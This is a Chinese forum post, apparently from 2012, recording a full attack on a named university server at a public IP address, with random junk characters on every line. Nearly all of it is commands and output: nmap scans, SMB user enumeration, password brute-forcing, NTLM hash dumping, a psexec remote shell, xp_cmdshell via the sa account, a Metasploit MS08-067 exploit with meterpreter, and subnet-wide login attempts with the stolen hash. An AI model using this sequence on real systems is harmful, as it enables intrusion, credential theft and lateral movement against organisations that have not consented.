广西师范网站http://202.103.242.241/
, l( p, j L* t& J3 e) }9 z, R/ n) K# ^+ t! \8 ~$ ^# R
root@bt:~# nmap -sS -sV 202.103.242.241
; \+ Q% e5 U/ F7 D6 z9 ~" v9 ~# {6 e0 W
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST; f: @! u. F' x) h9 F& r
' q* F( n* U( ~, G: @# v
Nmap scan report for bogon (202.103.242.241)+ n" k' O0 `6 j6 G N( u8 d9 I5 R
, c t, v- y/ Q* o* oHost is up (0.00048s latency).
; P0 W# F# v. C4 s( Y5 p5 A$ n$ J i
Not shown: 993 closed ports+ e+ y1 e+ d5 v' N0 u2 l, e# @5 o: I
: d7 G+ w' j- i8 O7 J% r% `PORT STATE SERVICE VERSION
4 R0 S2 u4 a+ h. l; V8 [4 l; ?: e a3 P& f) A; M( m) j& D* R
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
! W* y' }6 b. I3 C
2 |, u8 m* q/ [ W8 X& z139/tcp open netbios-ssn
+ c N/ [# q. W# j$ P# J$ e2 S7 {8 [- L9 C* Y
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds0 a3 F" U& q9 e4 R+ w
. ?5 F. B& j. v$ e7 @ x2 G1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 ^' _: }3 u: A6 l6 D( Z
1 x5 X1 x# A6 o
1026/tcp open msrpc Microsoft Windows RPC
, n+ J* [) P4 Q/ f2 U, E" ~5 c2 `/ \# ^3 J& t
3372/tcp open msdtc?. C& c/ L4 i: s+ c( J" J
% L% y" T5 A0 M, f0 h2 m, U+ C! g+ O, @
3389/tcp open ms-term-serv?
2 P. z. v$ f8 t/ \. i# Y
5 {$ `. _. P! G9 t/ H0 j/ j1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :/ R8 w0 ~7 ^( v' v L
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r$ ~2 m* x6 z7 W! A* z
8 T8 f" ?) l- ]3 L
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
* g7 D. q- M4 @: Y) s2 n% I, H0 F' u* a9 q$ R. {8 q3 P
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)* w& f* P! O6 [; W
8 J) B4 k9 d6 E- h* E! ^
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO& t3 r% {; L' V( H# ]2 ~+ ]8 _
8 O K3 O3 ?( T9 e& c0 z6 mSF:ptions,6,”hO\n\x000Z”);
6 @6 b$ [* W6 S E6 F( Y. Y
7 b# V- c& _' ?5 Z( X8 e( N& nMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems); i3 p4 {) }/ e2 T i9 r8 v+ l" v* C
2 s& z. b3 ?! \" s, s
Service Info: OS: Windows
9 m& C& s5 V; ?: j, Z7 S! p- Z. v2 D4 @1 K7 c- o+ c
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .2 u7 @: V! o( F; }
* [* r. A, s( Z f4 gNmap done: 1 IP address (1 host up) scanned in 79.12 seconds1 M& O+ i. ~9 W O1 u
' A) N& j3 ^% C7 c9 G
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
+ ] v8 E0 i6 T1 A. J) x
, F; I/ U- F+ \/ @-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse3 b5 L1 x1 n$ k- }8 ?
- \0 O% k) b: l5 m. D4 s1 B-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse a; L- o% \3 z+ N
F: y& V* |& j! t/ O0 E7 e; A
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
9 K# h, T1 r) T: I; U0 d$ C6 A, L% p- G! r
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
; m1 n& p$ d, f. I
O7 E* a5 q6 }' ?: f* \9 C-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse0 ~- H7 J4 y4 i* M% J) O$ X
, C1 T8 J" a0 u% R-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse* g% Y# L6 u% H( e% J2 p. ^9 o
G# d9 u2 b+ S0 G2 t. T
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
. w) l' E9 |3 \$ N( L5 o0 a+ y$ f# J1 a. R& d6 w. I
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
. r0 k$ a; d: C0 M; |/ h+ l9 Q* O! @) q; r5 L9 C u9 \: h3 N
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse4 e; o5 q+ r$ s* d) t1 \
! x8 N& n; B- H# I2 K) N* Q
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse8 \/ \$ E; G9 W( t
S1 U$ k- }2 S* i8 Q$ }0 L/ e* v-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
% H9 L+ F2 \( r1 ^. y" ]+ d5 ~$ Z# u; R T6 t. L
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse+ b' o$ n; B) | G9 g+ Z
4 C$ A6 U7 [! P1 R& s J
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse/ ?, e7 C7 N; k2 o
# j$ v( N8 Y+ L: l
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
5 i1 d( {/ [( G9 r0 |/ j' c6 L8 `0 o: N* L
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse6 n0 Y2 w- G9 o. o9 {" ], T2 R
5 ^2 a2 ^, {5 a+ }$ P1 F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
A: f4 \2 s% M4 ~, |' [
W6 Q/ U8 ?( R1 Y//此乃使用脚本扫描远程机器所存在的账户名
! O3 a# Z) \" O2 t) H. U$ C' L9 R8 [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST7 B' H0 U) ]5 ^. K6 F0 p
/ u9 s( `) u2 J L" o
Nmap scan report for bogon (202.103.242.241)) ]1 R. m7 G3 v8 a3 N+ T
) j$ s7 l8 E+ ?1 y9 M. V* [Host is up (0.00038s latency).
0 u7 ^ |& e/ a- n& g3 |
$ i) u$ {0 G/ i; T5 QNot shown: 993 closed ports
! a2 @' s) d9 O! u7 I$ U
/ {0 ~" `: U: E( iPORT STATE SERVICE2 r8 c8 p# [( E
" N0 P8 r8 K. b5 ]9 U135/tcp open msrpc
8 V# E4 e& K( \# e& A
. s% n# j4 y2 y: |8 P139/tcp open netbios-ssn6 u/ m: C4 R9 F& p6 c) S& {
, v2 f. x: E; N5 Q! l445/tcp open microsoft-ds
6 B2 I7 g% g& d8 x _
3 r2 n1 ^' j5 F( j$ @" U1025/tcp open NFS-or-IIS, u, a e9 y H* P1 \. s
$ R2 s: S( |" j, j. u' g( p9 F9 a
1026/tcp open LSA-or-nterm
' I6 }% d1 ~2 F- K7 v1 Y. [6 r, j4 {$ l9 `/ c" e
3372/tcp open msdtc4 O) o9 g- y3 z
9 B5 u: X5 d$ k0 t. \3389/tcp open ms-term-serv
- B! z; ?8 G+ x& l: v. n
1 V$ J3 x- I) x5 Z9 R( kMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" F9 y* K% ]2 T$ h# ^. I
+ o' L a2 Z6 b3 c3 u9 wHost script results:
( e0 \+ G# _4 P' b" p K: ~; u" M1 E ^1 T/ p0 \% r" }
| smb-enum-users:. b3 v; ?$ v' r; k
8 _* l; ?4 w+ }. n|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
0 J* K) \" e7 R% |1 k1 t3 \! F: l/ G) D, m1 n
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
% W! V1 ]- P$ }
% D& Y; ?" f( S4 Zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
2 \4 Z1 k- D& b" W
: l5 {0 O4 I* u0 n X" Z" U% B//查看共享
2 H% i: _! ~ j2 j" k) X0 ]1 U# C1 P8 s
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST# z M, k* P; X/ u7 p6 c
F# B8 X7 O5 L; o
Nmap scan report for bogon (202.103.242.241)
) m; A$ y9 J/ N. `/ m2 O% h7 A, D9 b# @& t: ]! g% G
Host is up (0.00035s latency).; U, `2 n3 p! z7 I0 E
' C6 e. S2 a9 v. oNot shown: 993 closed ports
* Q0 H$ ~+ j' x/ D. s5 D6 N/ k) c( d0 j$ l- |& n5 a, }4 \6 M
PORT STATE SERVICE6 W8 h, H9 l: e$ P, ?! E; b& @- ~
4 }) B4 J8 y/ c3 W
135/tcp open msrpc
, c! A R' b- [$ X3 ]. a9 Y* b0 z0 x+ X& e. q* a
139/tcp open netbios-ssn% b( t4 n" W$ F# Z
3 V0 V3 D$ e3 M
445/tcp open microsoft-ds
2 o1 u( \4 @6 `
- |% B6 T1 Z7 ?3 |1 O9 ?1025/tcp open NFS-or-IIS
8 F* h: k; W8 p" t4 a$ F. D
; W" X9 N+ z2 ~! e1026/tcp open LSA-or-nterm2 r) T$ u6 u) L: \: |4 R" m) t8 H
# J4 k5 Q. J( k: `" u9 X3372/tcp open msdtc
; {. L8 S% V& y& y3 V
% L( K- Q- l/ _; v! h* V3389/tcp open ms-term-serv
2 O3 e# F, [# W* E' x7 y/ I, i7 m! r2 x. `& m2 b( ~! I$ q+ e
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); R- e+ e) n' Z" k) C+ Y
. a/ [' c" n- j$ ~- S' t2 MHost script results:
3 v- J9 n) \2 r* J8 \
; K T0 `' o/ U| smb-enum-shares:# m1 c* F- G- f- h; u
- T# J$ k, M% ?, i% {% e6 o| ADMIN$
- S: _1 q8 D4 P4 w \9 J# U+ ?8 G* v4 o* R6 K: f% G
| Anonymous access: <none>" K) [& `2 r: }/ N, ]2 ~
* z1 W7 U+ w' M5 m) @9 [| C$
+ V4 Y: C; C. t4 B2 s! W, M3 k% t; G/ N& ]; ]# l
| Anonymous access: <none>7 [! B' }2 `/ ^3 R
( m6 T: g' u# m. b0 |; ^# D
| IPC$
5 u$ @ ?# \) n6 L
, Z9 N+ G+ [9 e/ ?: P1 j) F|_ Anonymous access: READ; t7 G8 g2 U$ g+ C" X
. \: w. ]0 v: E
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
* T4 E0 e& j: ?9 I7 k R& O" d7 u* g+ l. o/ c
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 5 e4 K X& F3 @% D& a' m
r6 O6 ?* v* ^; m//获取用户密码
) F7 I7 _1 F$ Q }. q @) V& s. M; A- ~& ~- p
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST( s" }/ i: |$ V# L2 Y8 B5 z
* k8 B) T; w% j1 K" G, ^: ~8 mNmap scan report for bogon (202.103.242.2418)! C f% l2 v% ?; I- Y H
7 f2 }6 ^7 B- x$ H5 o$ ZHost is up (0.00041s latency).
# N" F S8 S. x5 m9 {6 x5 T; j
: ]3 C) \7 [ ANot shown: 993 closed ports
# S. }! k* x: v- X4 x6 L
. f" \* u$ l0 W1 o) hPORT STATE SERVICE Q) |3 R! ]! q2 m( O6 F
+ G" p6 E& y, W5 c135/tcp open msrpc
' x# X' x2 p6 J; D, t
8 e3 @* u- U7 }+ N; Y+ f! q139/tcp open netbios-ssn
6 K$ H4 \5 `( C
! L9 @/ Z) y' c2 ]7 w445/tcp open microsoft-ds! E6 F2 s0 @2 E* N2 N8 w& |' [- \
& z5 e: K; [7 H b1025/tcp open NFS-or-IIS+ Q; [" e. ?. \. E' Y
5 \% A8 h) d8 Q/ j+ s! K
1026/tcp open LSA-or-nterm
6 H+ E& p/ ~9 w: N" g& S' p1 ^' q! O3 N9 f
3372/tcp open msdtc5 N9 n- J/ U( A
* b I4 }- h2 U/ K0 K' c8 }3389/tcp open ms-term-serv
) ~; S- D% N9 Z \4 }6 `9 h* P
9 ]8 E+ E+ q5 e. x ^MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 A L. b, |5 g3 ?: \! f* D8 m3 o# x
Host script results:2 G" x8 C2 k) g' m8 F3 H: H9 J4 ^* L% l
* c0 F! X: Y' i( C) h| smb-brute:
4 x$ r# J- ?" O, J1 `( u0 o' d w" a3 L3 V$ q
administrator:<blank> => Login was successful; q* Z8 @! p$ |" i
2 ]4 Z) B0 o1 C$ b8 a( w3 Z6 I|_ test:123456 => Login was successful+ Y3 }1 O4 Q7 V3 ^$ p4 R* x4 O
7 k! Y) q/ p+ B. B `2 kNmap done: 1 IP address (1 host up) scanned in 28.22 seconds# I; r, C1 W( I# B* u/ f0 H* H
% y" h; z2 ^3 R0 E( U
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
^" }4 h! @# d0 d; ?, }( @
! z! \) A" l0 Y/ Y+ sroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
4 j, f) Q& a" s4 B& v. ?2 m9 x' M( G1 t4 X% N
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse& T, e% N' C0 h9 R$ H- K# _# y* M
8 G! G& w" J# l; l
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
% y o) b' c" `* U& ^ o' P4 W
* R( o. a) E9 F* v) sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST" W- @) ^# Z( V
; I6 j0 i* Q9 D. Q2 w
Nmap scan report for bogon (202.103.242.241)+ D5 w' r2 \3 k+ L, @& m
: s) [* s+ o2 _1 e9 _
Host is up (0.0012s latency).
; Q5 G, p% G u) d& h) N- \: G) J( f# V2 t/ ^. U) L
PORT STATE SERVICE- A4 R2 R' i g9 S9 Z
% P; e5 G! g% R
135/tcp open msrpc
+ y/ e. H& J }4 o8 F8 h* E/ l
# J$ m; n n* f2 O( l6 q; u139/tcp open netbios-ssn
1 \9 s* [7 B( g8 e' \, Q" e
, ?' @" P5 G0 F# Z. m445/tcp open microsoft-ds9 R( Z, K; c# F
$ W( a+ l4 Q& w" B n- u! j, a& fMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* h. Z# ?$ c7 |
% C) g% I3 x" P$ b) I
Host script results:# P% Q' G7 F O+ J
3 ]$ K3 ]! @. Z
| smb-pwdump:
8 B' }+ Z9 B, x$ E, o5 r
+ \* h& q( b( Q1 E: M" J2 R3 B! @| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************: `1 ^" M0 k& Q$ k
! S% \5 Q# X3 r9 M| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************" K8 m- D: w o% x
6 F% r. I0 s/ [1 l1 || test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4. `. l0 t$ R) I
9 q6 S3 c( P* t% s|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
$ n1 j4 `! Z9 g( @+ N, P! f0 q4 d7 E" O0 ?- Y! d) n
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds3 M4 B; b1 B1 v' V; e5 P* a- e$ p
8 \- b" |1 N3 l# `
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
+ Z7 r1 T% v5 P: k8 t/ m9 a4 d' \# k7 j! [ x0 @% Q% p. K9 d
-p 123456 -e cmd.exe( n/ `3 K; q( w& J9 O, Y
% Z; o5 I& R& R Z r- f: L. A
PsExec v1.55 – Execute processes remotely
8 n k# N9 Q0 h. s: \" |8 X5 L. \) T* T
Copyright (C) 2001-2004 Mark Russinovich0 {4 H. p, U& H: p
5 ]4 S- s# ~2 N$ _ }* Z# i- n2 o9 o
Sysinternals – www.sysinternals.com2 y& {# |; R6 l# ^7 ]0 G( G1 `
+ H# I P! p3 Z5 dMicrosoft Windows 2000 [Version 5.00.2195]0 K, l- A* e; @) N1 e
* Z r F+ q; Q$ o- ^( }
(C) 版权所有 1985-2000 Microsoft Corp., p _" k( u6 S" q, X) I
6 a4 H `9 T3 ?4 A% e
C:\WINNT\system32>ipconfig5 Q) i7 k' X( r& J* i8 t( o
, ^$ v, _! p' J. h. iWindows 2000 IP Configuration
+ {! ^" S% ^; Q! d" k
1 V- {! K e, R, z% DEthernet adapter 本地连接:: R/ l. z Z+ s0 L
( f& U' _* \. f* D. p% L- Y" S9 e$ rConnection-specific DNS Suffix . :
, E$ i& S3 I7 q$ ]3 F, `0 T( [5 S7 c4 Q* O n3 o
IP Address. . . . . . . . . . . . : 202.103.242.241 t# s% e0 s& u5 v: f
P- g- ~4 ^- J1 O: ]& ESubnet Mask . . . . . . . . . . . : 255.255.255.0$ X5 M( U( m# T! Q
/ Z4 e& O, K; |9 G nDefault Gateway . . . . . . . . . : 202.103.1.1
. i* `+ [) r% n$ z; {0 Q# [6 L
, K U1 Y3 g5 {: |* K; w% J; XC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
6 p5 E2 l0 p+ [ H" p5 e D0 ~8 Z! A7 G w* H; N4 D8 S! B/ ^
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
8 q( H: F9 h+ X
4 @8 b( [; P/ z$ BStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
: L- u# E1 G4 D! o3 {$ P7 [1 j3 N+ A5 Q: S9 U' w: D
Nmap scan report for bogon (202.103.242.241)
& i2 X( d# y; p& p: [. m7 l; ^7 d9 V X7 t
Host is up (0.00046s latency)./ I# Y% ~& x% G9 T: H( n( z
' R; l0 y+ x4 x" A- KNot shown: 993 closed ports
3 T. p2 [ B: n
- A( `# d* W. n5 T/ w. ?2 vPORT STATE SERVICE
% o5 W6 y' g Z! [( Z& U& l t o# t+ e. p9 c
135/tcp open msrpc
' d$ a8 \% _' Y
- t) v& l8 U% {9 T8 J5 b139/tcp open netbios-ssn
( Y4 ?8 J2 @8 o* h, S8 z
x7 Y p3 Q! v" E9 f' s4 H1 }8 x445/tcp open microsoft-ds9 a! V+ F7 Q+ h! e! s* R
9 W0 B$ E% |# p! z l# ~# [
1025/tcp open NFS-or-IIS: O$ T2 J+ E; _) f* b! k4 u+ c
. X0 |1 V+ y% O2 O
1026/tcp open LSA-or-nterm
# R+ e: I: {* P/ |' j9 U2 \6 Z- p5 X8 [1 E" a9 j
3372/tcp open msdtc
) d' z C6 J6 o- h% b+ l1 |7 Y# n7 G7 f |5 O( c
3389/tcp open ms-term-serv
( t; c* @4 e* r4 |# C. a x. D8 u2 b3 R; S0 H( M" v
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 f) p4 z5 V) h. f. l9 j9 Q2 s; W5 h& j4 }
; |& C7 Y2 |* c" O9 n0 |Host script results:
! q) c4 S6 M3 h% |( ?! d9 U2 B P# r5 V5 ]8 S
| smb-check-vulns:
0 r+ A! W$ N. t5 s& K
! _) o; F* |" B7 J' ~' O|_ MS08-067: VULNERABLE8 \( h* o2 }) A$ p
0 P, P* Y9 h% dNmap done: 1 IP address (1 host up) scanned in 1.43 seconds% z+ n, m% K G2 a
6 N ]* G1 M3 k4 ~root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
0 D8 U9 t0 ?1 E G9 Z \: z7 \
msf > search ms08
% u% X+ b: f1 l+ e3 Q/ B: h E- s* |3 z5 b# H; y$ m; l4 p
msf > use exploit/windows/smb/ms08_067_netapi7 Z+ m; T. N5 n+ F; @2 H6 X
' @( `& n" m3 p l8 cmsf exploit(ms08_067_netapi) > show options
" F1 `8 X+ K8 Z& `$ m; K/ Q# b! Z s& ^+ M/ i* L" l' ]: B( \1 ^
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
# F; W/ W, w3 i0 z
: T4 u- }" c- ~# K2 Dmsf exploit(ms08_067_netapi) > show payloads. I3 `; }- W& C% D! R4 j" O
' B+ e4 G; O8 M! U. Qmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp v+ y' P5 |1 t; C8 c
# m' ~+ p8 r, Wmsf exploit(ms08_067_netapi) > exploit
* G0 Q4 c: p0 p K E) @& A' b8 Z; ^8 h
! f1 l/ T) I) X+ {$ imeterpreter >
3 o; e: k0 K8 @1 J" P0 `5 z) B/ `% X0 c1 _9 V8 ~. T
Background session 2? [y/N] (ctrl+z)
8 C7 ^1 [6 ^! Q) w9 M7 T
/ a+ ~: g! Y9 T' B$ K* `msf exploit(ms08_067_netapi) > sessions -l
( S- @% Y& j8 W( W% i6 N, L8 [% {# u+ |1 D0 C+ }
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt- _1 C3 S9 H6 p' `
1 D# y3 \. q& |$ y" @test. L( ]5 U" d' m" b9 h8 `
4 V8 r4 o; H! d" [ b3 d
administrator
7 m" Y8 j) C( g/ P+ G9 E) I+ y0 G/ A
3 }6 [0 j3 U2 v' k+ ^root@bt:/usr/local/share/nmap/scripts# vim password.txt
+ j$ x u& u" B3 L2 A4 _8 Q
* d4 @9 h7 i9 W44EFCE164AB921CAAAD3B435B51404EE
( i. O2 f1 [) E8 A6 }9 B( D. S) x- g6 ]" x8 O
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
7 }9 c5 T& h+ z, |% O$ r: t' z
' o* n' o+ \' F& c- _1 F //利用用户名跟获取的hash尝试对整段内网进行登录
5 [% X, C2 E3 e: Q C* ~
' ~: [# J! n% ]Nmap scan report for 192.168.1.105
6 L7 ~5 b" X3 g; l- E& i
. q$ ]* t" \7 S) q8 A; n: D& ^Host is up (0.00088s latency).
* c9 L6 j! r; J# V
5 k# O+ E8 o) P. `/ yNot shown: 993 closed ports0 P2 y6 c( d; J: c' ^( u
( [. u( Q, Y' T1 qPORT STATE SERVICE
; o5 w% H: p- D7 s; I8 l1 C1 g. p* a. u
135/tcp open msrpc) u+ L8 y' k; j
: k' ?/ x& Y$ A139/tcp open netbios-ssn
: e% S0 a! g' F, y: \8 B( F& ~$ Y
( {3 n& V" e; r1 O) s9 h1 i445/tcp open microsoft-ds
2 o, m. q }9 y" ]6 {$ W: O1 v% o9 N
1025/tcp open NFS-or-IIS7 j! a! u. L u
7 r* c x- Y% Z- c `) C& Y" i. R+ E
1026/tcp open LSA-or-nterm
6 R# q. R8 ? b( X+ `' j3 `3 M& k" u5 L% s M1 a3 p) F
3372/tcp open msdtc) _( o9 y! d9 z: S
4 a, K* S. x7 r7 m! [
3389/tcp open ms-term-serv
( k* U' M' h* G( A0 `* N6 }+ `+ k: L
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) \2 v. ]/ t! ~9 Z# Q/ h+ o
2 g J* ~0 _! i9 K4 b1 k5 K7 cHost script results:
& ]0 Y p) z1 z8 W4 u) u
* l( G7 j/ m" q! t| smb-brute:; g. i+ B9 x' k' A# x k) E, z' x
. M6 N0 ~5 _+ Y|_ administrator:<blank> => Login was successful
! C# t0 i1 p. u# H# p( Q+ |
7 e+ ~, |% m9 U' Q% k2 |攻击成功,一个简单的msf+nmap攻击~~·8 N7 ^" E" H% F# w" y' K
. i- x( L3 M G& Z5 a! _* u
|
发表于 2012-12-4 12:46:42
收藏
支持
反对